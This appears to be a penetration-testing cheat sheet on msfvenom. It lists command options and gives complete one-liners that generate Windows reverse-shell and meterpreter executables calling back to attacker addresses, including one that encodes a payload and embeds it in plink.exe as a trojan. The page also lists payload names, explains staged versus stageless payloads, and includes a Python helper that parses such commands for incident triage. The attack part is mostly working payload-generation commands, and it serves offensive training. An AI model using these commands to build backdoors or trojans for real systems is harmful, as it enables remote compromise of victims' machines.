# Msfvenom

![](https://2774131807-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M64VB6Sr653y4KPdauj%2F-M6G5gqO4VvhohFFsFeV%2F-M6G6PsGaChKqfm0jQCk%2FMSFvenom1.jpg?alt=media\&token=48fcb5c1-7b8d-4753-a708-cafb996f2e4a)

### Command Options

```
-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-b, --bad-chars: The list of characters to avoid
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-v, --var-name: Specify a custom variable name to use for certain output formats
-e, --encoder: The encoder to use
```

{% embed url="<https://www.offensive-security.com/metasploit-unleashed/msfvenom/>" %}

### Examples of Usage

```
msfvenom -l payloads | grep x86
# List payloads

msfvenom -p windows/shell_reverse_tcp --list-options
# Display payload options

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=4444 -f asp -o tcp_shell.asp

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=1234 -f exe -o tcp_shell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
# Injection into a PE file

msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe
```

### List of commonly used payloads

```
<Staged>
windows/shell/reverse_tcp  
windows/x64/shell/reverse_tcp
windows/meterpreter/reverse_tcp 
windows/x64/meterpreter/reverse_tcp

<Stageless>
windows/shell_reverse_tcp
windows/x64/shell_reverse_tcp
windows/meterpreter_reverse_tcp 
windows/x64/meterpreter_reverse_tcp
```

### Staged vs Stageless payloads

> Staged payloads are denoted with the use of a forward slash (**/**; e.g. **windows/shell/reverse\_tcp**). Staged payloads send a small stager to the target, which connects back to the attacker and downloads the rest of the payload. Therefore, staged payloads need special payload listeners, such as **multi/handler** in Metasploit. Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows (but that’s a story for another day).
>
> Stageless payloads are denoted with the use of an underscore (**\_**; e.g. **windows/shell\_reverse\_tcp**). Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data. That means we have a variety of listeners we can use, such as Netcat. Find out how to set up a listener using Netcat/Ncat in my post [here](https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da?source=friends_link\&sk=774174bfcb283864cf4468d2db460d0e).

{% embed url="<https://medium.com/@PenTest_duck/offensive-msfvenom-from-generating-shellcode-to-creating-trojans-4be10179bb86>" %}
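The following is an added example, not code from the original page or the quoted post: a triage helper for responders who recover msfvenom command lines from shell history or process logs. It applies the naming convention quoted above to flag staged builds (which imply a follow-up stage download from the callback host) and extracts `LHOST`/`LPORT`. The names `classify_payload`, `triage`, `HISTORY` and `REPORT` are hypothetical, and the rule is assumed to hold only for the `shell` and `meterpreter` names listed on this page.

```python
import shlex
STAGES = ("shell", "meterpreter")  # payload families listed on this page
FLAGS = {"-p": "payload", "--payload": "payload", "-f": "format",
         "--format": "format", "-e": "encoder", "--encoder": "encoder",
         "-i": "iterations", "-x": "template", "-o": "output"}

def classify_payload(name):
    """Return (staging, stage, connection) for a payload name."""
    parts = name.split("/")[1:]                 # drop the platform component
    if parts and parts[0] in ("x86", "x64"):    # optional architecture component
        parts = parts[1:]
    if len(parts) == 2 and parts[0] in STAGES:  # stage/stager: staged
        return ("staged", parts[0], parts[1])
    if len(parts) == 1:
        stage, _, conn = parts[0].partition("_")
        if stage in STAGES and conn:            # stage_stager: stageless
            return ("stageless", stage, conn)
    return ("unknown", None, None)              # outside the pattern assumed here

def triage(command_line):
    """Extract payload, callback endpoint and build options from one command."""
    try:
        tokens = shlex.split(command_line, comments=True)
    except ValueError:                          # unbalanced quotes in a damaged line
        return None
    if not tokens or not tokens[0].endswith("msfvenom"):
        return None
    info, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok in FLAGS and i + 1 < len(tokens):
            info[FLAGS[tok]] = tokens[i + 1]
            i += 1                              # skip the flag's value
        else:
            key, eq, value = tok.partition("=")
            if eq and key.isupper():            # datastore options: LHOST, LPORT
                info[key] = value
        i += 1
    if "payload" not in info:
        return None
    info["staging"], info["stage"], info["connection"] = classify_payload(info["payload"])
    return info

# Constructed input: history lines built from the commands shown on this page
HISTORY = [
    "msfvenom -l payloads | grep x86",
    "msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe",
]
REPORT = [r for r in map(triage, HISTORY) if r]  # one dict per payload build
```

A `template` key in the result means the payload was embedded in an existing executable with `-x`, so the output file's name and icon alone will not distinguish it from the legitimate binary.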

### Links

{% embed url="<https://www.hackingarticles.in/msfvenom-tutorials-beginners/>" %}

{% embed url="<https://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload/>" %}

{% embed url="<https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom>" %}

{% embed url="<https://netsec.ws/?p=331>" %}
